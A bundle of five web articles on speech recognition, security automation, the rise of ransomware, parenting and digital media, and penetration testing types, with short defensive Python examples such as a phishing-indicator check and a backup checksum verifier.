Speech recognition, also known as automatic speech recognition (ASR), computer speech recognition, or speech-to-text, is a capability that enables a program to process human speech into a written format. It is often confused with voice recognition, but speech recognition focuses on the translation of speech from a verbal format to a text one, whereas voice recognition just seeks to identify an individual user's voice.

Natural language processing (NLP)

Natural language processing (NLP) refers to the branch of AI that gives computers the ability to understand text and spoken words in much the same way human beings can. NLP combines computational linguistics with statistical, machine learning (ML), and deep learning models. Together, these technologies enable computers to process human language in the form of text or voice data and to 'understand' its full meaning, complete with the speaker or writer's intent and sentiment. NLP can translate text from one language to another, respond to spoken commands, and summarise large volumes of text rapidly—even in real-time. It is very likely that you've interacted with NLP in the form of voice-operated GPS systems, digital assistants, speech-to-text dictation software, customer service chatbots, and other consumer conveniences.

Uses of speech recognition

Speech technology has been deployed in digital personal assistants, smart speakers, smart homes, and a wide range of other products. The technology allows us to perform a variety of voice-activated tasks. Apple's Siri and Amazon's Alexa use AI-powered speech recognition to provide voice or text support, whereas voice-to-text applications like Google Dictate transcribe your dictated words to text. Typing with your voice allows you to speak emails and documents into existence by hitting the microphone option on your device's keyboard. Voice search is the most common use of this technology. In 2021, it was estimated that 5 billion people would use voice-activated search and assistants around the world, a number that could rise to 6.4 billion in 2022.
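To make the speech-to-text idea concrete, here is a minimal sketch using the open-source Python SpeechRecognition library. The library choice and the audio file name are illustrative assumptions, not tools mentioned in the article, and the free Google web recognizer it calls is just one of several possible back ends.

```python
# Minimal speech-to-text sketch using the open-source SpeechRecognition
# library (pip install SpeechRecognition). The audio file name is
# illustrative; any 16-bit PCM WAV file will do.
import speech_recognition as sr

recognizer = sr.Recognizer()

# Load a short recording and capture the whole clip as audio data.
with sr.AudioFile("meeting_clip.wav") as source:
    audio = recognizer.record(source)

try:
    # Send the audio to the free Google web recognizer and print the transcript.
    print(recognizer.recognize_google(audio))
except sr.UnknownValueError:
    print("Speech was unintelligible")
except sr.RequestError as err:
    print(f"Recognition service unavailable: {err}")
```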
Source: https://aimagazine.com/technology/speech-recognition-and-ai-what-you-need-know (Common Crawl, CC-MAIN-2022-40)
The human brain is magnificent in its ability to process information. However, compared to advances in artificial intelligence and automation (which never sleep), it pales in its ability to keep up. The truth is, while some cybersecurity tasks must be performed by humans, there are some things that machines can accomplish that humans can't. When used in the areas where it shines, automation can be a priceless tool in the effort to achieve effective cybersecurity. Utilized in specific processes, automation can improve threat detection capabilities, decrease incident response time, and reduce or eliminate errors. Furthermore, automated tools and systems can address many of the issues creating challenges for cybersecurity professionals in the current threat landscape. Quality automated systems that are properly optimized to your network environment have the capability to alleviate the stress on short-staffed teams, reduce burnout, and address constant network growth. Now, more than ever before, cybersecurity professionals need cybersecurity tools and systems that decrease the workload while increasing accuracy.

How Is Automation Used in Cybersecurity?

Automation is used in different aspects of cybersecurity to complete tasks that are redundant, can't be effectively completed by humans, or are prone to human error. Automated cybersecurity solutions can complete time-consuming tasks that take up the time of cybersecurity professionals, allowing them to focus on high-value tasks. Automation can also improve speed and accuracy in specific tasks, and it significantly improves the ability of cybersecurity teams to accurately detect and rapidly respond to active threats. These are some of the most effective ways automation is used in cybersecurity.

Log Collection and Monitoring

Any business network is made up of multiple devices that complete hundreds of tasks each day. For every action that takes place on your network, an event is logged. By monitoring these logs, your security team can learn about the activity that occurs on your network. However, the task of collecting mass amounts of data, parsing it into categories, and analyzing it for unusual activity is impossible for a single data analyst or even a large group of analysts. An automated log monitoring system collects the data, parses it into categories, and normalizes the data so it is easily readable. From there, machine learning can be used to establish a baseline of normal behavior for each user. When activities occur that fall outside of this baseline, an alert is generated. This automated activity occurs in real-time, only taking seconds for each action to occur. Log monitoring is one of the most vital processes for effective cybersecurity. By automating the process, you can keep up with network activity in real-time and provide your data analysts with information relevant to the security of your business.

Intercept Phishing Attempts

Despite the fact that email has been a primary way for businesses to communicate for decades, 91% of all cyberattacks begin with an email. In 2021, 96% of organizations were targeted by an email-related phishing attempt. Unfortunately, human error is a major factor in successful email attacks. In fact, 85% of breaches include a human element, and 61% are related to stolen or misused credentials. Today's sophisticated phishing and business email compromise (BEC) attacks can generate fraudulent emails that are practically identical to legitimate brand or company emails.
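Before looking at how automated interception works, here is a rough sketch of the kind of indicator matching such a system can act on. It is illustrative only: the blocklists and message fields are hypothetical, not taken from any particular SOAR product.

```python
# Toy illustration of indicator matching on an inbound email.
# The blocklists and message fields below are hypothetical examples.
SUSPICIOUS_SENDER_DOMAINS = {"invoice-update.example", "secure-login.example"}
SUSPICIOUS_URL_FRAGMENTS = ("bit.ly/", "login-verify", "password-reset")
RISKY_ATTACHMENT_TYPES = (".exe", ".js", ".vbs", ".iso")

def phishing_indicators(message: dict) -> list[str]:
    """Return a list of reasons an email looks like a phishing attempt."""
    reasons = []
    if message["sender"].split("@")[-1] in SUSPICIOUS_SENDER_DOMAINS:
        reasons.append("sender domain on blocklist")
    for url in message.get("urls", []):
        if any(fragment in url for fragment in SUSPICIOUS_URL_FRAGMENTS):
            reasons.append(f"suspicious URL: {url}")
    for name in message.get("attachments", []):
        if name.lower().endswith(RISKY_ATTACHMENT_TYPES):
            reasons.append(f"risky attachment: {name}")
    return reasons

email = {
    "sender": "billing@invoice-update.example",
    "urls": ["http://bit.ly/acct-check"],
    "attachments": ["statement.iso"],
}
print(phishing_indicators(email))  # three reasons -> quarantine before delivery
```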
Automated interception actions are the best way to avoid becoming the victim of a phishing attack that provides a hacker with an entryway into your network. An automated SOAR system begins protecting against phishing attempts at the log monitoring level with alerts based on IP addresses, URLs, attachments, or other fraud indicators. Since SOAR is designed to orchestrate security tasks into a consistent system, alerts can be used to launch a series of actions to intercept phishing emails before they reach their target. Without automated response, an alert would be sent to data analysts for investigation. It would then be prioritized in a long list of other potential threats, ranked by level of danger and importance. Conversely, an automated SOAR system can be 'taught' to respond to phishing attempts in a specific way. As a result, phishing attempts are intercepted in real-time, and in many cases, never received.

Recognize Internal Threats

Traditional cybersecurity systems depended on protecting an organizational network perimeter with tools like firewalls and antivirus software. While keeping threats out of your network is always an important goal, today's sophisticated threats make it impossible to assume your organizational network will never be breached. Internal threats are risks that are already lurking within your organization's network. While these threats can come from bad actors within your company, they often begin as external threats. Internal threats are always more difficult to detect because they mimic legitimate behavior. An automated SOAR system that begins with log collection includes knowledge of normal behavior within your network. This knowledge, called user and entity behavior analytics (UEBA), is used to generate alerts when a seemingly legitimate network user performs activities that could represent a threat. Flagging and responding to these actions in real-time is critical to reducing the dwell time an attacker spends in your network. With the use of automation, an attacker can be recognized and the activity halted before the attacker reaches their objective.

Find and Address Vulnerabilities

Cyber attackers work tirelessly to find flaws in software or organizational processes that can be exploited to create a vulnerability that allows malicious entry. Thousands of types of software exist, and hundreds of various vulnerabilities are uncovered each month. To effectively keep up with the speed of evolving threats manually, even a small business would require a team of experts dedicated to searching for vulnerabilities around the clock. Such a process would require analysts to spend countless hours examining complex data for indications of a vulnerability that could allow hackers to access your network. The task would be incredibly time-consuming and labor-intensive. Considering the drudgery and repetitive nature of the task, the potential for human error is high, and increased dwell time is likely. Conversely, automated scanning works in the background of your network in real-time, reducing the potential for dwell time and eliminating human error. A vulnerability scan is a high-level automated test that searches for known vulnerabilities within your system and reports them. Some scans can identify as many as 50,000 known weaknesses that can be exploited by hackers.
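As a hedged illustration of what a vulnerability scan does conceptually, the sketch below compares an inventory of installed software against advisories listing known-vulnerable versions. All package names, versions, and advisory IDs are invented.

```python
# Toy sketch of the concept behind a vulnerability scan: compare an inventory
# of installed software against advisories listing known-vulnerable versions.
# Package names, versions, and advisory IDs are made up for illustration.
INSTALLED = {"examplelib": "2.4.1", "webserver": "1.18.0", "dbengine": "14.2.0"}

ADVISORIES = [
    {"package": "examplelib", "fixed_in": "2.4.3", "id": "EXAMPLE-2022-0001"},
    {"package": "webserver", "fixed_in": "1.20.1", "id": "EXAMPLE-2021-0042"},
]

def parse(version: str) -> tuple[int, ...]:
    return tuple(int(part) for part in version.split("."))

def scan(installed: dict[str, str], advisories: list[dict]) -> list[str]:
    """Report every installed package older than the advisory's fixed version."""
    findings = []
    for advisory in advisories:
        current = installed.get(advisory["package"])
        if current and parse(current) < parse(advisory["fixed_in"]):
            findings.append(f"{advisory['package']} {current} is affected by {advisory['id']}")
    return findings

print(scan(INSTALLED, ADVISORIES))
# ['examplelib 2.4.1 is affected by EXAMPLE-2022-0001',
#  'webserver 1.18.0 is affected by EXAMPLE-2021-0042']
```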
Ransomware attacks rose by 92.7% in 2021 compared to 2020 levels, with 1,389 reported attacks in 2020 and 2,690 in 2021.(1) Malware, including ransomware, is typically introduced to business networks through seemingly innocuous methods of data sharing and business communications, like document sharing and email. To humans, these downloads appear safe. Technically, there is no way to manually ensure a file won't be malicious upon opening. Automated anti-malware tools identify known and previously unseen malicious files or actions, then launch a series of response actions to prevent the files from being opened or downloaded. The process begins with a real-time analysis that automatically checks the file, plugin, or sample to see if it's a threat. If a threat is detected, an alert is sent out and the offending file is quarantined. Depending on the threat and the tools used for the process, the file may then be opened in a restricted environment like a sandbox.

Reduce Dwell Time

Some of the most common attacks used by hackers depend on discretion for success. Phishing, business email compromise, and credential theft are some of the most common ways hackers access your network to move laterally within the systems and gain access to more power and sensitive data. These attacks mimic legitimate behavior to allow hackers to stay hidden in your network. Since modern sophisticated threats depend on discretion, they are, by nature, difficult for humans to detect. Furthermore, it's impossible for humans to monitor massive amounts of network data in real-time. An automated SOAR system monitors data in real-time and uses UEBA to detect suspicious behavior. Upon detection, an alert is sent out and a series of incident response actions is immediately launched. These actions can work to quarantine the threat, shut down affected devices, or offer additional actions to mitigate the threat.

5 Reasons You Should Implement Security Automation Now

- Reduces Alert Fatigue
- Eliminates Burnout
- Improves Response Time
- Addresses Staff Shortages
- Reduces the Severity of an Attack

The cybersecurity landscape is more complex than ever before. The number of cyberattacks launched each year is growing exponentially. Cybercrime has become a global enterprise where criminals can buy and sell illegal products designed to successfully infiltrate business networks. Attackers can even utilize automation to carry out mass attacks against multiple institutions at once. As a result, threat actors with little to no experience can carry out successful attacks. This low barrier to entry for cybercrime allows more bad actors to participate. More attackers and more attacks have cybersecurity teams stretched thin and facing seemingly insurmountable challenges. Automation can help alleviate the extra strain placed on internal teams by addressing these pressing issues.

Reduces Alert Fatigue

Professionals in the cybersecurity industry are required to be on high alert at all times. The effects of the pandemic on the workforce introduced a plethora of new responsibilities into the field, which increases the number of alerts coming at analysts from all angles. In a survey, 93% of respondents claimed they could not address all the alerts they receive in one day.(2) For short-staffed teams, a high volume of alerts is impossible to process and requires constant prioritization.
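One way automation reduces that volume is by deduplicating and ranking alerts before an analyst ever sees them, as the following paragraphs describe. The toy sketch below shows the idea; the alert fields and severity weights are hypothetical, not taken from any particular product.

```python
# Toy sketch of alert deduplication and prioritization. The alert fields and
# severity weights are hypothetical, not taken from any specific SOAR product.
from collections import defaultdict

SEVERITY = {"malware": 90, "impossible_travel": 70, "failed_login": 30}

raw_alerts = [
    {"type": "failed_login", "user": "alice", "host": "vpn-gw"},
    {"type": "failed_login", "user": "alice", "host": "vpn-gw"},   # duplicate
    {"type": "impossible_travel", "user": "alice", "host": "vpn-gw"},
    {"type": "malware", "user": "bob", "host": "laptop-17"},
]

# 1. Deduplicate: collapse alerts that share the same (type, user, host) key.
grouped = defaultdict(int)
for alert in raw_alerts:
    grouped[(alert["type"], alert["user"], alert["host"])] += 1

# 2. Prioritize: rank each unique alert by severity, breaking ties by count.
queue = sorted(
    ({"type": t, "user": u, "host": h, "count": n, "severity": SEVERITY[t]}
     for (t, u, h), n in grouped.items()),
    key=lambda a: (a["severity"], a["count"]),
    reverse=True,
)

for item in queue:
    print(item)  # highest-severity, most-repeated alerts first
```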
Analysts spend as much as 75% of their time investigating false positives.(3) When the majority of alerts don't represent an actual threat, professionals grow numb to the alert process. This desensitization leads to missed or ignored alerts that can leave your network vulnerable to an attack. In fact, a recent report revealed that companies with 500-1,499 employees ignore or don't investigate 27% of all the alerts they receive. While a large number of alerts plays a part in alert fatigue, it isn't the only culprit. In poorly optimized systems, alerts are typically very similar and offer little context about the potential danger to an organization. These undefined threats look practically identical and seem redundant. Even worse, when systems and tools are not integrated, many alerts actually are redundant. When properly optimized, an automated cybersecurity solution can address all the contributors to alert fatigue. Automated SOAR begins with targeted log monitoring that accurately detects suspicious behavior. Redundant alerts are eliminated, decreasing the sheer number of alerts. Context can be applied to alerts that clearly defines why a specific event is a threat to your organization. Instead of a deluge of vague threats, analysts get automatically prioritized alerts with vital contextual information and response guidance.

Eliminates Burnout

Repetitive tasks and high-stress work environments are some of the leading causes of burnout. These factors are an ongoing part of working in cybersecurity. The pandemic has increased pressures in the industry, with 80% of cybersecurity professionals feeling more stressed in their roles. This increased stress leads to increased burnout and increased turnover. Cybersecurity teams grow even smaller, leading to more burnout and creating a vicious cycle. With that knowledge in mind, it might seem like eliminating burnout in cybersecurity would be an impossibility. However, by tackling the direct causes of burnout, automation can help relieve the strain placed on cybersecurity professionals. The causes of burnout in cybersecurity range from heavy workloads and long hours to poor processes and user pushback. By implementing automation in areas where AI-enabled software can outpace human performance, you can decrease workloads, improve efficiency, and free up professionals to concentrate on high-value tasks. The process begins with automated SIEM that monitors network activity. UEBA establishes a baseline to define normal network behavior. These tools accurately detect threats and add contextual information to limit the number of alerts received by analysts. Security orchestration, automation, and response (SOAR) generates automatic incident response processes and remediation procedures to respond to low-level security events. Central threat intelligence (CTI) automatically updates threat feeds that protect organizational networks from known threats and vulnerabilities. By implementing these highly effective automated cybersecurity systems, you can reduce the heavy workload placed on cybersecurity professionals. Automation and AI never sleep, which means your cybersecurity teams can. Long hours, excessive overtime, and always being on call generate unhealthy stress levels that lead to burnout. As automation addresses all of these concerns, burnout among cybersecurity professionals is reduced.

Improves Response Time

In the effort to eliminate threats from your network, detection is only half the battle.
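Response speed is commonly tracked with the two metrics discussed below, mean time to detect (MTTD) and mean time to respond (MTTR). Here is a small worked sketch of how they can be computed from incident timestamps; the incidents themselves are invented.

```python
# Worked sketch: computing mean time to detect (MTTD) and mean time to
# respond (MTTR) from incident timestamps. The incidents are invented.
from datetime import datetime as dt

incidents = [
    {"occurred": dt(2022, 3, 1, 8, 0), "detected": dt(2022, 3, 1, 9, 30),
     "contained": dt(2022, 3, 1, 11, 0)},
    {"occurred": dt(2022, 3, 5, 14, 0), "detected": dt(2022, 3, 6, 10, 0),
     "contained": dt(2022, 3, 6, 18, 0)},
]

def mean_hours(deltas):
    return sum(d.total_seconds() for d in deltas) / len(deltas) / 3600

mttd = mean_hours([i["detected"] - i["occurred"] for i in incidents])
mttr = mean_hours([i["contained"] - i["detected"] for i in incidents])
print(f"MTTD: {mttd:.1f} h, MTTR: {mttr:.1f} h")  # MTTD: 10.8 h, MTTR: 4.8 h
```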
Your effective response is critical in limiting the amount of time that hackers have access to your network. According to the IBM Security Cost of a Data Breach Report, 2021, the average time to identify and contain a breach is 287 days.(4) Extended dwell times can significantly impact the severity of a successful cyberattack. Successful incident response depends on several critical factors. Teams must have the capability to investigate data to determine the severity of an attack. Specific actions must take place instantaneously to contain the threat and avoid further damage. Remediation must take place as soon as possible to eliminate the expenses of downtime. Automated security orchestration and response systems work in multiple ways to address these requirements. Security orchestration gathers information from multiple systems and connects the information to define a single incident. Low-priority alerts trigger automated response actions to contain or eliminate the threat. Automated responses take the place of slower manual operations. Aggregated reports provide clear details for a seamless investigation that provides additional information about the threat environment. As a result, the mean time to detection and the mean time to respond are both reduced considerably, limiting the damage that can be done to your network.

Addresses Staff Shortages

In the US, 465,000 cybersecurity positions are currently unfilled. 67% of security professionals say they don't have enough talent on their team, and 17% say it feels like each person is doing the workload of three. Even with exemplary recruitment tactics and outstanding salary and benefits packages, successfully filling empty positions in cybersecurity is a challenge. Unfortunately, there is no immediate solution to fill the gap. However, automated cybersecurity solutions can reduce the requirements placed on cybersecurity teams so the need isn't as great. It's true that automation will never replace trained human professionals in cybersecurity. However, when automation is combined with the skills of professionals, teams can accomplish more effective threat detection and response with less time and effort. When properly optimized, automated systems provide security teams with more information about potential risks and vulnerabilities. Crowd-sourced data is automatically gathered by the system and used to prompt actions (like updates and patch applications) that eliminate existing vulnerabilities. Automated log monitoring improves threat detection efforts by orchestrating data monitoring from multiple tools to eliminate redundant alerts and apply context to every alert. As a result, the manual efforts required from cybersecurity experts are significantly reduced. When alerts are designed to automatically trigger specific response actions, an attack can be immediately contained, further reducing the manual tasks required of data analysts and engineers. When automation is deployed to cybersecurity workflows, the requirements for cybersecurity professionals to spend time on manual and repetitive tasks are eliminated, allowing them to spend time on higher-level tasks. Automated tools and services reduce the workload for your existing cybersecurity team members, allowing them to accomplish more in less time.

Reduces the Severity of an Attack

At the end of the day, the severity of an attack makes all the difference between a minor incident and a catastrophic blow to your business.
IBM's Cost of a Data Breach Report, 2022, revealed that the average cost of a data breach is at an all-time high.(5) Data breach average cost increased 2.6% from $4.24 million in 2021 to $4.35 million in 2022. The report also reveals that security AI had the biggest cost-mitigating effect on attacks, with the average breach costing up to $3.05 million less at organizations with it than those without it. Cybersecurity automation offers improved detection, limits dwell time, and speeds response time. Each of these capabilities works to significantly decrease the severity of a potential attack on your business network. In the modern cyberthreat landscape, it's no longer enough to wait and hope that external protections are sufficient. Effective cybersecurity depends on automated systems that can process data in real-time and provide complete visibility into the actions that are currently taking place in your network. Automated cybersecurity systems provide highly skilled cybersecurity professionals with the tools necessary to keep up with the pace of modern technology. As a result, cyberattacks can be detected and contained before damage is done to your network. Implement Security Automation for a Secure Modern Network Businesses depend on technology to improve production and performance. The average business network is continually growing to keep up with changing workforce requirements and consumer demand for convenience. Modern hackers utilize technology and automation to conduct advanced attacks on business networks with higher success rates and increased speed. Security automation has evolved to provide cybersecurity professionals with the power to analyze data in real-time and detect sophisticated threats designed to discreetly infiltrate company networks. Automated orchestration and response capabilities improve the interaction of cybersecurity tools to provide automatic response and remediation actions at the speed attacks actually occur. When your teams have these tools to detect and respond to the continual deluge of attack attempts, manual labor and redundant tasks are reduced, allowing cybersecurity professionals to use their education and experience to perform high-level tasks that eliminate vulnerabilities and reduce risk potential. The result is an overall improvement in cybersecurity posture and the ability to detect and eliminate threats. If you're new to cybersecurity automation, the sheer number of tools available can make it difficult to determine how to make the most of your budget. Learn more about the implementation process by watching our on-demand webinar: Optimize Your Security Posture by Combining the Power of Automation With Human Intervention.
Source: https://www.bitlyft.com/resources/5-reasons-to-implement-security-automation-now (Common Crawl, CC-MAIN-2022-40)
There have been many major ransomware attacks in 2021. Bangkok Airways, Acer, the Brazilian National Treasury, and the Spanish government made the news this year. Here's a look at what ransomware attacks are and why they are on the rise.

What is ransomware?

Ransomware is a type of malware (malicious software) that holds the data on your device to ransom. If your computer system is affected by ransomware, your data and applications may be encrypted such that you no longer have access to them. At this point, the attacker demands a ransom in return for restoring access to the system. Unfortunately, in most instances, the system is not restored even after the demands are met. In the recent past, ransomware attacks worldwide have significantly increased. A new organisation has become a ransomware victim almost every 11 seconds in 2021. Most attackers demand huge amounts of money in the form of bitcoin due to the ease of online payment and to maintain anonymity. While ransomware attacks can target firms of any size, smaller companies tend to have a tougher time recovering from this breach in cybersecurity.

How ransomware works

Here's what happens during a ransomware attack:
- Malware received: Individuals receive the ransomware in the form of an infected application or an email attachment. Typically, ransomware and other malware is triggered from phishing/spam emails.
- Malware installed: Once you download the application to your system, it installs itself on the system as well as any other accessible devices on the same network.
- Connects with cybercriminals: The application contacts the cybercriminals to generate cryptographic keys for the infected system.
- Files encrypted: The application crawls through your system and encrypts all the files it finds. You can no longer access any file on your system.
- Ransom demand: The application displays a message on the system stating the demands of the attack and payment instructions.
- System restoration/destruction: You may be able to restore the affected devices with stored backup data. Cybercriminals may or may not restore the system after the payment is completed. If you are unable to restore the system or meet the ransom, you have probably lost the data and information for good.

Why are ransomware attacks rising?

- For cybercriminals, this is a quick way to make a lot of money. A single application can send emails to thousands of people and there is a high chance of someone opening one.
- Malicious applications are being sent in the form of Covid-19-related information such as information regarding vaccines and sanitizers. These click-baits are more likely to hook people.
- The pandemic has caused a spike in Internet usage. This gives the criminals a wider target audience.
- It is almost impossible to track cryptocurrency transactions, making it much easier for cybercriminals to hide their tracks.
- Paying the ransom (even though you may see no other choice) incentivizes criminals to find more victims to extort money. It is likely this has encouraged cybercriminals to increase the ransom amount with each attack.

Cybersecurity measures to take during ransomware attacks

While ransomware attacks can happen due to a simple mistake, they can cause significant damage to a company. By following some simple cybersecurity rules, you minimise attacks. But what would you do if your system is affected? The steps below walk through a basic response.
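Before the response steps, here is a rough, hedged illustration of one behavioural signal defensive tools watch for: an unusually large burst of file modifications in a short window. The directory, threshold, and window are invented, and real endpoint protection combines many more signals.

```python
# Toy heuristic: flag a possible ransomware infection when an unusually large
# number of files change within a short window. The threshold, window, and
# directory are invented for illustration; real tools combine many signals.
import os
import time

WATCH_DIR = "/srv/shared"      # hypothetical file share
WINDOW_SECONDS = 60
MAX_CHANGES_PER_WINDOW = 200

def recently_modified(root: str, window: float) -> int:
    """Count files under `root` modified within the last `window` seconds."""
    cutoff = time.time() - window
    count = 0
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            try:
                if os.path.getmtime(os.path.join(dirpath, name)) >= cutoff:
                    count += 1
            except OSError:
                pass  # file removed while scanning
    return count

changes = recently_modified(WATCH_DIR, WINDOW_SECONDS)
if changes > MAX_CHANGES_PER_WINDOW:
    print(f"ALERT: {changes} files changed in the last minute - possible ransomware")
```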
Step 1: Restrain the situation

Turn off the network connectivity to this system so that other devices in the network aren't affected. Make your colleagues/staff and the IT department aware of the situation. The safest thing to do at this point would be to turn off the network completely before more devices are affected.

Step 2: Assess the systems

Analyze all systems in the network to find ones that have been affected by the malware. During this search, you could also find systems that haven't been affected in any way. While other devices have to be restored, you can use unaffected devices to continue your business.

Step 3: Assess the backups

A good cybersecurity measure is to have a backup and recovery system in place for your organization. If you have such systems, assess their state to see if they are compromised.

Step 4: Inform the team and stakeholders

Let your staff and stakeholders know what's happening. This could include the ransom demands, chances of recovery from backup logs, expected downtime, etc.

Step 5: Recover your systems

Using the backup logs, recover each system affected by the ransomware. The IT team should be able to run scripts to identify affected files and replace them individually as well. Conduct thorough reviews to ensure that all malware is eradicated before restoring the network.

With the rise of ransomware attacks, the importance of cybersecurity is now higher than ever. Taking the right measures and being aware of these threats is necessary to avoid such attacks. But you never know how or when these incidents can occur. The best measure against ransomware attacks is to have a reliable backup and recovery system in place.
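Since the advice above comes down to trustworthy backups, here is a small, hedged sketch of one sanity check teams often script: recomputing file checksums and comparing them to a manifest recorded when the backup was taken. The paths and manifest format are invented for illustration.

```python
# Toy backup integrity check: recompute SHA-256 hashes for backed-up files and
# compare them to a manifest written at backup time. Paths and the manifest
# format ("<hexdigest>  <relative path>" per line) are invented for illustration.
import hashlib
from pathlib import Path

BACKUP_ROOT = Path("/backups/2021-10-01")      # hypothetical backup location
MANIFEST = BACKUP_ROOT / "manifest.sha256"

def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

mismatches = []
for line in MANIFEST.read_text().splitlines():
    expected, rel_path = line.split(maxsplit=1)
    target = BACKUP_ROOT / rel_path
    if not target.exists() or sha256_of(target) != expected:
        mismatches.append(rel_path)

print("Backup verified" if not mismatches else f"Corrupt or missing: {mismatches}")
```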
Source: https://news.networktigers.com/industry-news/why-are-ransomware-attacks-on-the-rise/ (Common Crawl, CC-MAIN-2022-40)
To protect your child from prevalent online hazards such as cyberbullying, online predators, and sexting, you need to teach your kids digital etiquette. Use parental control apps to help them understand how to use social media responsibly. Being surrounded by electronic gadgets since birth, kids know the devices like the back of their hands. Technology can be a great resource for education and entertainment for children, but parents should also consider the health implications of screen time. Parents, with the help of child monitoring apps, can teach their kids the ways of being in control of tech-life balance. The following are a few points to keep in mind while establishing family guidelines for safe and satisfying technology use. We created this list of tips especially for those of you who wish to know how to teach your kids to use digital media properly.

Parenting tips for promoting healthy technology use among children

Do not overreact

Whether we like it or not, technology is an indispensable part of our modern world. Setting overly restrictive limits on a child never helps in the long run. Instead, it would send a message that technology is something to fear, which it is clearly not. Try to put yourself in your child's shoes and ask yourself – how would you feel if you asked an elder for anything and all you got was a 'no' most of the time? Let your kids have experience in digital media, and help them understand the correct way to proceed by being there for them. Overreacting is never a good idea when you know how to teach your kids to use digital media properly. The focus should be on teaching healthy habits that will stay with your child for a lifetime. And kid's safety apps help you achieve that.

Teach kids about technology from an early age

Yes, it is essential to teach them about technology when they are young. It does not mean handing over the gadgets to pacify them when they are just toddlers. When they reach a certain age, gradually introduce them to the devices. First, explain that tablets, computers, and other gadgets are not toys and should be handled with care. Discuss the benefits of technology as well as the risks without frightening them. Let your kids know the importance of respecting privacy and protecting personal information by applying proper privacy settings. And as they grow older, conversations should become more detailed.

Lead by example

Children are like sponges; they absorb from the surroundings, and parents are the ones who can influence them the most. If you just keep preaching without following your words, you can imagine what impression your child would get! When your child is trying to converse with you, and you reply mindlessly staring at your phone, they would get the impression that the smartphone enjoys priority over them. Be attentive and let them know people matter, not the phones.

Be a good judge

You need to use your judgment, whether it is about your child's maturity or the situation in which they are asking to use a device. No one knows your child better than you. Screen-time limits are a good idea at times, but you need to consider the context when establishing technology rules for your family. Video calling with family members is different from playing a video game. The world won't end if you are entertaining your preschooler because the situation wouldn't allow you to do anything else.
If they are doing research for a school assignment, or they are gathering more knowledge across the web for something of their interest, it wouldn’t be wrong to let them use the device. With child monitoring apps, prohibit your child from accessing inappropriate content. Keep updating yourself As a parent, it is your responsibility to prepare your child for their future. You need to be aware of the ever-evolving technology to teach them how to work within social boundaries and to continue to discover how society works. Children, by nature, are comfortable with the technical side of the online world. Still, they have to understand that the internet, being a public place, requires the enforcement of some privacy settings to ensure their reputation remains intact. Parents need to guide, educate, and support the children with an understanding of their world and a clear perspective of all they face. Get accurate parenting advice with parental control apps. Regulate kid’s bedtime According to research, the blue light emitted from smartphones stifles the natural production of the sleep hormone – melatonin. So, physicians recommend that screens should be avoided at least an hour before going to bed. It is better to set a rule for elders as well as children that no device should be allowed in the bedroom. Going to bed on time regulates a child’s body clock, which helps them to have a regular schedule. Maintain your child’s schedule with the help of kid’s safety apps. Be attentive to their online activities When kids are younger, you can easily monitor what they’re doing online. As they grow, it gets difficult. Parents should have honest discussions about what sites and content are off-limits. Look into the media your child is using, and check out your child’s browser history to see what sites they visit. Enforce digital etiquette Teach your child a basic set of rules pertaining to behavior that needs to be followed to ensure the safety and integrity of every internet user, including them. They need to understand the use of good manners in online communication such as email, forums, blogs, and social media. With the facility to stay behind the screens, people often say things online that they would never say to someone’s face. There is a rise in the number of teens who have witnessed cyberbullying. Talk to your children about the importance of being considerate and respectful in their digital interactions. Talk about digital decision-making It is difficult to ascertain whether some websites offer reliable information or not. Talk to your child about ways to evaluate authenticity and accuracy online. Explain why they should refrain from downloading unfamiliar programs, or clicking on suspicious links, or sharing personal information on unknown apps or websites. Also, ask them not to respond to messages from strangers. Before learning how to teach your kids to use digital media properly, it’s important to teach them to trust you. Encourage them to approach you if they ever witness cyberbullying or other troubling information online. Some kids prefer to spend more time online than playing with friends in real life. Tell them, digital friendships can never replace real friends. Help your child to nurture their real-life relationships. Invest in a parenting control app Bit Guardian Parental Control helps you monitor your child’s online activities. It is a godsend for parents who are apprehensive about their children’s safety in the digital world. 
Parental control apps allow parents to block inappropriate apps, limit screen time, set a geofence around a child, and more. You can also block anonymous, unwanted, or spam calls, or calls from known numbers. Bit Guardian Parental Control is a child monitoring app that permits you to filter or restrict access to content on a child's phone that's off-limits. It comprises the various features mentioned above. Now we know that keeping kids away from devices altogether is not an option. It would be like stripping them of fun and entertainment, and, more importantly, it would compromise their personal growth and skill-building. Parents who know how to teach their kids to use digital media properly can create a safer digital world for their precious ones. Just be present and guide your child by downloading a parental control app for Android.
Source: https://blog.bit-guardian.com/how-to-teach-your-kids-to-use-digital-media/ (Common Crawl, CC-MAIN-2022-40)
Why penetration testing is important

Cyber security has become a major concern for all organisations, especially with the increase of remote working and working from home. One successful cyber attack can lose your business and destroy customer trust. It is, therefore, more important than ever to carry out vulnerability scans and penetration testing. Penetration testing, or pen testing, is a core element in your cyber security policy. From reading this article, you'll understand the importance and benefits provided by pen testing.

What is penetration testing and why is it important

Penetration testing is a way of checking your IT system by attempting to break through some or all of your system's security, using the same techniques as a hacker might. It's like a third-party audit that assures you your company's cyber security processes are up to scratch. Ideally, the tests should verify what you already know or suspect. However, using experienced pen testers can often reveal more subtle issues your internal IT staff may not be aware of. This is why penetration testing is required. You can use pen testing to improve your company's internal vulnerability assessments and risk management processes. Penetration testers can perform a wide range of testing, which we'll look at below, including:
- Whitebox penetration testing
- Blackbox penetration testing
- Greybox penetration testing
- Vulnerability testing
- Web application testing
- Mobile application testing
- Automated penetration testing

Types of penetration testing

Pen tests vary in their approach and the weaknesses they try to exploit. Your specific situation and requirements will determine the best approach and extent of the testing.

Whitebox penetration testing

This is where the pen tester is fully aware of all your network and system information. They'll have full knowledge of and access to any source code and your network environment. Therefore, whitebox tests can often be more in-depth, providing more targeted, detailed results.

Blackbox penetration testing

In this case, no information is provided to the tester at all. It can be seen as the most authentic approach, as it demonstrates how an attacker with no inside knowledge may target your business systems.

Greybox penetration testing

As the name suggests, greybox testing is somewhere between white and black testing. It's where only limited information is shared with the tester. This might be login details, for example. Greybox penetration testing is often used to highlight the level of access a privileged user can gain and the potential damage they could cause to your systems. It's also used to simulate a cyber attack that has breached your network perimeter.

What's the difference or relationship between vulnerability testing and core penetration testing?

Vulnerability testing or scanning evaluates security risks in your software systems to reduce the probability of threats. It looks for vulnerabilities in your IT systems and reports potential issues. Penetration tests go a step further – they exploit these vulnerabilities in your network and report the level to which a hacker may gain access. A vulnerability scan is usually automated, whereas a pen test is often performed manually.
